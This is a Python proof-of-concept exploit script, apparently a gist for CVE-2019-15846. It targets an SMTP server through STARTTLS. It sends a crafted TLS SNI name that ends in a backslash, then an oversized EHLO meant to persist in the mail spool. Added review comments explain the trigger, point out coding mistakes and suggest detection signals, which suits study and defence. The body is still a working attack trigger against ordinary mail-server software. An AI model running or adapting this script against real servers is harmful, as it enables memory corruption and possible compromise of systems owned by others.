CVE-2019-15846
import socket
import struct
import ssl
HOST = '127.0.0.1'  # loopback: the script is written against a local test instance
PORT = 587          # SMTP submission port, plain text until STARTTLS
# TLS client context with certificate verification disabled (private CPython
# helper, not a public API). The peer is never authenticated, which is only
# acceptable for the loopback target above.
context = ssl._create_unverified_context()
# NOTE(review): ssl.PROTOCOL_TLSv1_2 is a protocol selector meant for the
# SSLContext constructor, not an OP_* option flag; OR-ing it into `options`
# sets unrelated option bits and does not pin TLS 1.2. Only the
# OP_NO_TLSv1 / OP_NO_TLSv1_1 / OP_NO_COMPRESSION flags take effect here.
context.options |= ssl.PROTOCOL_TLSv1_2 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_COMPRESSION
# payload must have length multiple of target system alignment - 1
# The string assembled below is passed as the TLS SNI server name (see the
# wrap_socket call). Its defining property is that it ends in a single
# backslash, which is not a valid hostname character; that trailing backslash
# in the SNI appears to be the condition the gist title (CVE-2019-15846)
# refers to. A server carrying the upstream fix for that CVE is not expected
# to be affected. For detection, an SNI value ending in '\' can be alerted
# on at the TLS layer before any SMTP state is touched.
payload = ""
payload += "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0A"
payload += "c1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae"
payload += "2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3"
payload += "Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai"
payload += "\\"  # the literal "\\" is one backslash character
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    # Plain-text SMTP dialogue up to STARTTLS. Every reply is only printed,
    # never parsed, so a 4xx/5xx answer (e.g. STARTTLS refused) does not
    # stop the script from continuing.
    s.connect((HOST, PORT))
    print(s.recv(1024))  # server greeting
    # NOTE(review): socket.send may write fewer bytes than requested;
    # sendall is the call that guarantees a whole line goes out.
    s.send(b'EHLO [127.0.0.1]\r\n')
    print(s.recv(1024))
    s.send(b'STARTTLS\r\n')
    print(s.recv(1024))
    # TLS handshake on the same socket; `payload` is sent as the SNI
    # server_name extension, no certificate is checked (see context above).
    with context.wrap_socket(s, server_hostname=payload) as conn:
        # This will persist in the spool
        # Second EHLO with a 0x3600-byte (13824) argument of 'E' characters.
        # An EHLO argument of that size is itself anomalous and is a
        # reasonable detection signal on the receiving side.
        conn.send(b"EHLO " + b"E"*0x3600 + b"\r\n")
        print(conn.recv(1024))
        # Sending message
        # From here on no reply is read at all, so a rejection at MAIL, RCPT
        # or DATA goes unnoticed. NOTE(review): RFC 5321 syntax is
        # `MAIL FROM:<addr>` / `RCPT TO:<addr>` with angle brackets; the
        # bare form relies on lenient servers.
        conn.send(b'MAIL FROM: root@example.com\r\n')
        conn.send(b'RCPT TO: root@example.com\r\n')
        conn.send(b'DATA\r\n')
        conn.send(b'SUBJECT: root\r\n')  # header line of the message body
        conn.send(b'blabla\r\n')
        conn.send(b'\r\n')
        conn.send(b'.\r\n')  # end-of-DATA marker
        conn.send(b'\r\n')   # stray empty line after the terminating dot
        conn.send(b'QUIT\r\n')